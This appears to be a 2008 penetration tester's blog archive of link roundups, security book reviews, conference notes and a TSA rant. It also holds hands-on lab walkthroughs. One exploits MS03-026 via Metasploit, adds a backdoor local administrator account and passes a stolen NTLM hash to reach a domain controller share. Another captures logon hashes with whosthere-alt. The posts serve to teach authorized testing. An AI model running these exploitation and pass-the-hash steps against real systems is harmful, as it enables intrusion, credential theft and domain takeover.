Thursday, March 27, 2008
I watched Rich Mogull's Understanding and Preventing Data Breaches
and the l0pht Panel.
Rich's talk was really interesting, right up until the video stops short of the end of the talk :-(
The l0pht panel was really interesting as well. Those guys did so much for the industry; it was great to hear them talk about the "good ol' days" and see what they are all doing now.
To do: watch Dan Geer's keynote.
I also caught Chris Wysopal's talk at Black Hat D.C. on Classification and Detection of Application Backdoors. It was about all the "extra" code that was put into different projects and programs over the years and timelines of how long it took for those "additions" to be discovered.
A couple of bloggers did writeups on it:
dre over at TS/SCI
David Maynor over at Errata Security
I'm sure there is more.
The pwn2own winner was Charlie Miller of Independent Security Evaluators.
Checking out their site, it looks like they have been doing work on OS X vulnerabilities and research into selling 0day. Interesting.
Link: The legitimate vulnerability market: the secretive world of 0-day exploit sales
Charles Miller, Independent Security Evaluators
To me it was brilliant marketing on behalf of ISE. I don't really deal with 0day, with the exception of begging for them, but I imagine that a remote preauth exploit on any of the 3 OSes involved in the pwn2own contest is worth way more than $20k on both the "dark side" and the "good side" of "responsible" disclosure. On the other hand, ISE gets to be on the front page of every security mag and blog for the next few days for the price of giving up one client-side exploit, and they get $10,000 on top of it. Cheers guys. Job well done. Bonus points for pwning the system.
and more fun from: http://www.securityevaluators.com/independent_eva.html
Services we do not provide:
Don't pay us to run nessus
At ISE, we offer specialized expert security services. Therefore, we do not perform commodity services such as automated networks scans and firewall configuration.
ISE also does not do Common Criteria evaluation.
Life is too short.
Monday, March 24, 2008
Lenny's paper gives 3 attack scenarios to use when testing:
1. Track the clicks (low impact).
2. Plant a back door without exploitation (medium impact).
3. Exploit a client-side vulnerability (high impact).
Dean did a post about spear phishing during a pen test, which basically covered the 1st option. We used Google Analytics to track who clicked on the initial link, then a 2nd tracker for who actually entered data. Of course we don't know if that data was any good, but someone put "something" in and hit the Enter button.
I would propose a 4th category: actually use the credentials to see if I can escalate on the network or data mine. It's important to see just how much damage can be done when a user gives up a network logon to the bad guy.
Anyway, Lenny's paper is worth a read, as is Jay Beale's talk "They're Hacking Our Clients": http://toorcon.org/2007/talks/63/ClientVA-Toorcon9-Oct2007.pdf
There is also an associated site that hasn't been updated since last year :-(
I'm not one of those "security predictions" kind of people, but organizations should start conducting client-side exploitation during pen tests, both as a training event and to see what kind of access can be gained and damage done when credentials are obtained, instead of 1) saying "we have a training program so we are good" or 2) saying "yes, we know our clients are jacked up, so go ahead and just test the network defenses anyway."
Thursday, March 20, 2008
-Chris is slated to talk about "New School Information Gathering" on Friday
-Dean is supposed to talk as well
Here are the details:
ChicagoCon 2008s: White Hats Come Together in Defense of the Digital Frontier
May 12 – 18, 2008
The Spring Edition of ChicagoCon features all new keynoters, additional security boot camps, exams on-site followed by a two-day ethical hacking conference. And without an exhibit hall full of sales pitches, you're free to learn from the pros, network with peers and advance your InfoSec career. Not just another boot camp or hacker con, ChicagoCon adds value to your training dollars with top instructors and well known certifications. 13 courses including CISSP, CEH, CHFI, Advanced Hacking, BackTrack to the Max (First Time EVER), Cisco, Microsoft, SANS, SOX, Security+ and more. The 2 days of “Con” Activities May 16 – 17 are only $100 (free for training students) and offers presentations, breakout sessions & hacking contests. From the novice, to the ultimate techie, to the CISO chair... everyone interested in a career in security will find something at ChicagoCon, your one-stop shop for security training and certification. Keynotes: Geahan (FBI), Echemendia (Hacking Instructor), McOmie (TruTV's Tiger Team), Murray (Neohapsis) & Carpenter (SANS, Intelguardians). Presented by www.ethicalhacker.net.
Potential for something great was there but wasn't delivered
I'm going to take a harsh stance on this book, mostly because this book had potential to really build upon all the information publicly available for Metasploit and really make a great book on Metasploit internals and advanced usage. Instead it seems like current public/free information was just rehashed and new information not updated for the 3.x branch of MSF.
What I consider the "meat" of this book, and what should have made this a 4 or 5 star book, covers the Metasploit Framework 2.x branch and NOT the current 3.x branch. By "meat" I mean the case studies covering exploitation using MSF. The major difference between the two is that 2.x was written in Perl and 3.x in Ruby. To be fair the first 5 chapters cover using MSF 3.x, but I really didn't feel they covered much, if anything, that's not out on the net with the exception of Chapter 5 (Adding new Payloads). "Using" Metasploit has been covered a million times in a million other books. A book specifically on Metasploit should have covered things not covered in every other hacking book.
Chapter 1 is an "Introduction to Metasploit." If you haven't ever used the tool and didn't want to RTFM, then "maybe" it would be useful for you. Most of the material I felt could be found on the Metasploit main support page, the wiki, or via google, but mostly the first two. I'm also not sure why there are pages and pages of current payloads and exploits with no explanations as to why I would use one type of payload versus another especially for the obscure ones like find tag or ordinal payloads. Doing a "show exploits" or "show payloads" without dialogue on the differences adds little value. The Leveraging Metasploit on Penetration Tests section is one paragraph :-(
Chapter 2 is "Architecture, Environment, and Installation." There are 2-3 pages on locking down a system. Why is that included? Very random. Let me cover the installation covered in the book for you. Windows, double click the executable. *nix, download via svn. That's about the level of detail we get...sigh :-(
Chapter 3 is a whopping 7 pages including the FAQ section on "Metasploit Framework and Advanced Environment Configurations." That chapter covers what is in the directories of your msf installation and using the setg command.
Chapter 4 is "Advanced Payload and Add-on Modules." Covers some old information on meterpreter and some meterpreter basics, the stuff on the net covers it in far more detail. Decent coverage of the VNC Inject payload, crappy coverage of the PassiveX payload, ok coverage of auxiliary modules and a mention of db autopwn.
Chapter 5 is "Adding New Payloads." Chapter 5 is the best chapter in the book because it discusses something...here it goes...NEW! and related to MSF 3.x. Chapter 5 is an excellent chapter walking us thru building a SIP Invite spoofer auxiliary module. Had the whole book been of this caliber it would have been a 5 star book.
The case studies should have been rewritten to work with MSF 3.x; they are all for 2.x. They are good and contain the required detail (but I have not worked through all the examples yet). Things are similar between the branches and you can probably muddle through the conversions, but it makes no sense for the first half of the book to be about 3.x and the meat to be about 2.x. At a minimum a chapter or section on converting exploits from 2.x to 3.x was in order, but was not included.
I didn't find Appendix B, "Building a Test Lab for Penetration Testing" to be all that helpful either. I think it's a reprint from Penetration Tester's Open Source Toolkit v2, but can't confirm because I don't have that book.
Tuesday, March 18, 2008
Anyway, what the hell do I know. On with the link:
Monday, March 17, 2008
here's the link:
and here's a screenshot:
I don't believe I'll ever have to crack a password (least for windows) again :-) --take that NTLM and NTLMv2!
Sunday, March 16, 2008
Are your devices pre-0wned? Time to re-look at that great deal on goods/labor we get from China: http://www.veracode.com/blog/?p=82
FinCEN and how it helped catch Spitzer: http://blogs.zdnet.com/BTL/?p=8211
Weak passwords strike again: http://blog.liquidinfo.net/2008/03/case-of-weak-password.html
inguma 0.0.7.2: looks like the tool is coming around, so it's time for another go with it:
XSS in SNMP web interfaces, check out Adrian Pastor's comment: http://www.sensepost.com/blog/2120.html#comments
Seven deadly pen-test sins: http://www.matasano.com/log/1026/seven-deadly-pen-test-sins/
and Mike Andrews commentary on it: http://www.mikeandrews.com/2008/03/15/seven-deadly-pen-test-sins/
(Ab)using scheduled tasks to elevate privileges over on sensepost blog/videos
and Elevating Privileges using Sygate's Personal Firewall http://www.sensepost.com/videostatic/sygate/sygate.html
Saturday, March 15, 2008
I'm going to consider this post half finished because I don't think iam.exe and iam-alt.exe are working properly for me yet. Hopefully Hernan will respond to this post or the comments I made on his blog and get me fixed up.
OK, so on with it. The scenario is that you have a local admin account on a box, which is easy to get from a remote exploit, but no domain user permissions. From a data mining perspective, or for further enumeration, even domain user permissions are nice. At a minimum I can browse public shares in the domain for info.
First step: I have already created my local admin account on the box and uploaded my tools, whosthere-alt.exe and its DLL, and iam-alt.exe and its DLL.
Let's log in via psexec and run whosthere-alt.exe.
We can see that we have logged in via our test account, and there is a vmware user account that probably doesn't have any permissions. whosthere-alt.exe has a cool feature: it will listen indefinitely and log to a file, so you can start the process and wait for someone, hopefully with domain admin, to log into the box, and it will capture those hashes for you.
Let's check out the help options for whosthere-alt.exe and iam-alt.exe, and use whosthere-alt.exe to capture logins for us.
As you can see in the image above, whoami says I am test/segfault. We start running whosthere-alt in logging mode (-i -o bigfun.txt), and then in the 2nd shell we check bigfun.txt to see if anyone new has logged in: a user "root" has.
From there we use iam-alt.exe to become user root. It appears from the output that it's working, but I couldn't confirm it: whoami.exe still said I was test, and any processes I started were still owned by test :-(
iam.exe/iam-alt.exe not working is not the end of the world though (in fact I'm sure it's user error): if the account you gathered through whosthere.exe is admin or better, you can still use the psexec module in Metasploit to pass the hash and get yourself a shell.
Reliance on author's tool detracts from the book's potential
Thanks to McGraw-Hill for my review copy.
Based on my review criteria: http://carnal0wnage.blogspot.com/2008/03/book-review-criteria.html this book should have easily been a 4 or 5 star book, but I gave it 3 stars for its major flaw. Its major flaw is that it only talks about iSEC Partners' SecurityQA Toolbar as a tool for testing for the different types of web application vulnerabilities. Only discussing one closed source, for-pay tool that only runs on Windows is really disappointing from a security professional standpoint. I really expected a good snapshot in time of the DIFFERENT tools and techniques for doing web 2.0 auditing. There are tons of “for-pay” and, more importantly, FREE web application scanners and tools that look for the same vulnerabilities discussed in the book, and the fact that they don't mention any other tools or methods is very disappointing.
Now that the above is out of the way...lets get on with the likes and dislikes.
-The analysis of the samy worm is excellent. They break the code apart and really analyze what's going on and why it worked at the time.
-The chapter on ActiveX security is excellent. It covers a lot of ground on why ActiveX controls are bad, how to fuzz them and how to defend against them.
-The whole first part of the book on Web 1.0 vulnerabilities is well written, I had just finished XSS attacks and having that background helped a lot with the relevant chapters in HE Web 2.0.
-The book is short, about 246 pages; that's probably too short for the price of a security book.
-A good chunk of the chapters cover over and over installing and using their SecurityQA Toolbar, I only need it once, if that.
-I think the book stops a bit short of actually exploiting Web 2.0 vulnerabilities. It talks a lot about identifying which 2.0 framework an application was built with and identifying different methods in that application, if debug functionality is enabled, and finding hidden URLs but how I exploit SQL injection issues or XPATH injection or LDAP injection issues IN web 2.0 applications is missing. That was the core problem with web 1.0, its still a valid and dangerous entry point for web 2.0 and should have been covered. Hacking Exposed is generally about exploiting vulnerabilities and not stopping at identifying them which is where the book seems to have stopped.
Overall the authors are obviously very knowledgeable about the subject. One of the other reviewers mentioned that it goes from technically very easy to very difficult even within chapters, and I think this is true. The code samples for the examples they give are great, and their explanations of the web 1.0 and web 2.0 threats are very well written with good examples. Like I said, had it not been for their fixation with their own tool as the only option we have for web 1.0 and 2.0 testing, this would have easily been a 4 star book. For those a bit more interested in web 2.0 I would recommend checking out Shreeraj Shah's Web 2.0 Security and Hacking Web Services books and his website, which has free web 2.0 auditing tools.
Friday, March 14, 2008
Wednesday, March 12, 2008
No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing by Johnny Long
Solid advice on securing the human vulnerability
Johnny Long has a great knack for taking what should be common sense observations on human vulnerabilities and making them unique, entertaining, and most importantly actionable. The book really seems to be a book to go along with his numerous “No Tech Hacking” talks he has given at several security conferences. If you want an example check out the 2007 Shmoocon Archives: shmoocon.org/2007/presentations.html
Here are the chapters:
Social Engineering with Jack Wiles
All of the chapters are pretty good; I particularly liked the Physical Security, P2P Hacking, and Kiosks chapters (even though the last was a short one). Again, a lot of what he talks about is common sense and taken from the talks he gives at security conferences. But it comes from a guy that gets paid to break into buildings for a living, so you can trust the advice and situations to be pretty close to reality.
Things I liked about the book:
-The Physical Security section talks about defeating different types of locks and security systems. It was good relevant content with good advice on how to fix it. The Kiosk chapter talks a little bit about breaking out of Kiosks and information you can gather. Using P2P to look for sensitive documents is a good idea as well. Really all the chapters had valuable information in them. In plain words he sums up relevant and dangerous security issues that target the human element of security.
-The large font and lots of pictures make the book a quick read. I also like that there were pictures to go along with all the points he was trying to make. His “arrest me face” on page 95 is the best.
-The book is pretty much without typos and editing issues which says a lot for a syngress book.
-The book is useful for both technicians and managers, I feel like i can give the book to both the techies and management and have them both get something out of it.
Some things I didn't like about the book:
-The book has a slight condescending tone. I think this is the author's attempt to be funny, and in person I think he could have pulled it off. But in print it really comes across as a “you are dumb, so dumb I have to write a book about hacking you without technology to show you how dumb you are.” It doesn't make the book “bad” its just annoying at times.
-The tailgating section (page 24) slams a person for wearing their badge INSIDE and says she is not security conscious. Why would you NOT wear your badge inside? On one hand he complains about people not challenging him because of his fake badge or lack of a badge, and then he says that wearing a badge inside is an opportunity for someone who sneaks in to take pictures of it. Well, guess what: they are already inside, and there are other, bigger issues now. In my opinion, badge on inside = good, badge on outside at lunch = bad.
-The book suffers a bit from the "Everything must be secure... damn the functionality" problem that a lot of security researchers and hard core security proposals suffer from. What I mean by all that is sometimes security people lose sight of why things are they way they are or the fact that changing the way things are done would hinder actually getting work done. The best example I can come up with from the book is his discussion of DoD decals on cars (in the vehicle surveillance chapter) and how they give away too much information. While not arguing his point on giving away information, I'd like to see his proposal for a better solution to access control on DoD bases. I'd also argue that oil change stickers showing where I got my oil changed (that may give you some information on where I live or work) are far less dangerous than that person just following me to home or work now that they have me and my car associated with one another.
5 stars: Book brought new detail or information to light, nothing else like it out there or a great update. Well written, few typos, well edited.
4 stars: Good information but nothing "new", written pretty well; good but not outstanding, has some issues.
3 stars: In some form or fashion the book has flaws whether it be editing or content, usually just average content.
2 stars: Shouldn't be used to start fires, but possibly pretty close.
1 stars: Probably shouldn't have been published and I want my money back, brings nothing of value whatsoever.
**Ideally, all those stars are qualified/explained with the write-up
If you disagree or have some things to add, PLEASE leave a comment :-)
Tuesday, March 11, 2008
and a TSA rant from my last trip:
While TSA didn't hold me up, I would have preferred they did. Just got back from an overseas flight. We cram all our gear for assessments into those big black Pelican cases. I spent about 45 minutes getting everything packed in there nice and tight, where nothing would rattle around and break, since I had signed for it and we have the "you break it, you bought it" policy. So I get to the airport early; sometimes no one cares about the big black case, sometimes they do. I also got a nice fat padlock for it; again, sometimes they care, sometimes they don't.
That morning they did, but I got lucky. I must have had the most polite, nice TSA guy I have ever met. He was like, what's in the case? I'm like, computer equipment. He's like, OK, I have to look inside, what's the combo? He gets the case open and starts going through it. He's behind a screen, so I can only see his head and not what he is doing. I go, can you please make sure you put things back in there properly, I have to pay if stuff gets broken, and he's like, sure, sure, no problem. I'm waiting outside the roped area to make sure everything gets locked up properly and back on its way. Finally I hear him closing it up and locking it, and he throws the thing on the conveyor belt, smiles, and says everything is good to go and to have a nice flight.
I get to the hotel on the other end like 20 hours later and open the case. EVERYTHING is all over the place, not even remotely where it was placed: hard drives, switches, cables all over the case, and he even put the laptops back in with the screens facing out, so a nice hard kick to the bottom of the case should have taken care of me getting any work done on the trip (will save that piece of knowledge for later). Anyway, just annoying that the guy was so nice all the while doing such a crappy job. Thankfully nothing was broken. I understand the need to protect us, and I'm glad people are there trying to do that, but if they can't have enough respect for our stuff to put it back in there right, or allow US to put it back in there, then don't open the crap up.
Sunday, March 9, 2008
-Even though you were invited by someone in that organization to make security better, there are plenty of people in that organization that DIDN'T invite you and don't want you there. Especially if it requires them doing some work to get you IP space or a place to put all your gear, or just requires them to get off their ass in general. Not to mention you are there to see how good a job they have been doing, and if they haven't been doing a good job...
-Be prepared to be blamed for any and all network issues that arise while you are there doing your assessment, even if you are out to dinner :-) The customer had a network outage occur while I was at dinner. Now, even though DoS was not in the scope, instead of the admins actually doing some work to determine the cause of the outage, I was immediately blamed for doing a Denial of Service attack on the subnet. Apparently from outside the firewall AND through my phone AND while I was at dinner I was able to make this happen on a non-public network. How's that for some kung fu!
-Be prepared for the person that invited you in (#1) to not be real thrilled when you succeed. In fact, be prepared for them to be really pissed when you do your low-tech hacking into their secure building or if you totally own their network.
**The rest of this probably is in some hacking book
-If you share IP space with people, buildings, and computers you have no control over, you may want to treat all those things as hostile to your network. Blindly trusting data and traffic coming from computers based on IP has never been a good thing and still isn't.
-Other things in the do not do list
* Do not broadcast your virtual meetings via VNC without authentication, especially if you blindly trust IPs in your range that you don't control. Watching briefings and meetings through unauthenticated VNC sessions is always fun.
* LM hashes are just bad in so many ways I can't even start, especially if your patch policy is bad.
* A password policy with no complexity, length or age requirements isn't much of a password policy.
Link to article on hakin9
If someone has serious heartburn about not wanting to sign up, leave a comment and maybe I'll get motivated to put it on the carnal main site or email it to you.
Wednesday, March 5, 2008
you can read more on msvctl here:
It essentially dumps the hashes of currently logged-on sessions from memory; you can then take one of those hashes, "pass it", and run commands as that user. So no more needing to crack hashes: you can pass the hash and be that person without ever knowing the password.
The scenario we find ourselves in at work, and why I am interested in getting this crap working, is that we pop a box on a domain with a remote exploit but we usually end up as SYSTEM. SYSTEM can do whatever it wants on that box EXCEPT anything useful on the domain: as far as the DC is concerned, SYSTEM is just the computer account, with no privileges that matter, and that sux, because the goal is usually to be a domain or enterprise admin. We normally put a netcat-type trojan in the startup folder and wait for an admin to log in. Waiting sux, and I'm not a patient guy.
The demo in the link above he does with psexec. I'm on Linux and things weren't quite working out for me, and it wasn't working from a meterpreter shell (probably a token issue, which is probably why he did it with psexec). Anyway, what I did was...
1. got a remote shell via DCOM (yeah I know, it's a demo, so shut up)
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129 ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129 ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.29.1:40467 -> 192.168.29.129:4444)
msf exploit(ms03_026_dcom) > sessions -l
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.29.1:40467 -> 192.168.29.129:4444
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
2. created a temp directory and then uploaded msvctl.exe & msvctl.dll via meterpreter
meterpreter > upload
Usage: upload [options] src1 src2 src3 ... destination
Uploads local files and directories to the remote machine.
-r Upload recursively.
meterpreter > upload msvctl/msvctl_0.3/msvctl.exe msvctl.exe
[*] uploading : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
[*] uploaded : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
meterpreter > upload msvctl/msvctl_0.3/msvctl.dll msvctl.dll
[*] uploading : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
[*] uploaded : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
3. created a local account on the box and added it to the local admin group
meterpreter > execute -f cmd.exe -i -c -H
Process 404 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32\temp>net user localfun localfun /add
net user localfun localfun /add
The command completed successfully.
C:\WINDOWS\system32\temp>net localgroup administrators localfun /add
net localgroup administrators localfun /add
The command completed successfully.
4. logged into the box with my new local account via RDP
5. to test privileges i tried to map to the C drive of the domain controller
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\localfun>net use \\192.168.29.128\c$
The password or user name is invalid for \\192.168.29.128\c$.
Enter the user name for '192.168.29.128': localfun
Enter the password for 192.168.29.128:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
6. CD'ed into the msvctl temp directory and did a list to see what hashes were available. We see our own credentials, and that domain user chris has logged on recently.
7. inject a cmd.exe using LSOCORP\chris's hash and get a cmd.exe shell with his permissions.
C:\WINDOWS\system32\temp>msvctl.exe LSOCORP\chris 19fe4717a7c8b55daad3b435b51404ee:f2c0c177de720154d024a26e09f0feb3 run cmd
info: running 'cmd '
**at this point i had another cmd.exe shell pop up, i was then able to map a share to the domain controller using that cmd.exe
C:\WINDOWS\system32>net use * \\192.168.29.128\C$
Drive Z: is now connected to \\192.168.29.128\C$.
The command completed successfully.
New connections will be remembered.
Status Local Remote Network
OK Z: \\192.168.29.128\C$ Microsoft Windows Network
\\.host VMware Shared Folders
The command completed successfully.
Volume in drive Z has no label.
Volume Serial Number is 9CB6-7878
Directory of Z:\
05/04/2004 12:41 PM 0 AUTOEXEC.BAT
05/04/2004 12:41 PM 0 CONFIG.SYS
09/05/2007 02:44 PM Documents and Settings
08/12/2007 10:55 AM Inetpub
05/04/2004 03:54 AM Program Files
09/16/2007 01:57 PM WINDOWS
05/04/2004 12:42 PM wmpub
2 File(s) 0 bytes
5 Dir(s) 2,025,148,416 bytes free
Tuesday, March 4, 2008
To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory.
With full access to the memory, the tool can then modify Windows' password protection code, which is stored there, and render it ineffective."
Very cool. Of course, most people know that if you have physical access to a computer it's essentially yours anyway. The idea was originally presented in 2006 at Ruxcon, and now the code is released... now where did I put that firewire cable...
Article Link: http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html
Monday, March 3, 2008
Bottom line is that even if you "flash" the drive every night, or if it's non-persistent, you might want to make sure the "fresh" image isn't vulnerable to some old-ass remote exploit :-)